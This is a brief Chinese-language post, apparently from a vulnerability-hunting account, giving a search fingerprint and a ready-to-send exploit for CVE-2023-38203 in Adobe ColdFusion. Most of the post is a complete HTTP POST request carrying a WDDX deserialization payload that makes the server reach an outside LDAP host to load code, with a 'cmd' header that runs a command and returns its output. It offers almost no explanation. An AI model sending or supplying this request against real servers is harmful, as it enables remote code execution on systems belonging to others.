CVE-2023-38203

CVE-2023-38203

原创 Abandon6 漏洞猎人 2024-04-04 07:47

使使使

影响版本

app=”Adobe-ColdFusion”

poc&exp

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 289
cmd: dir

argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>ldap://192.168.40.1:1389/Basic/TomcatEcho</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>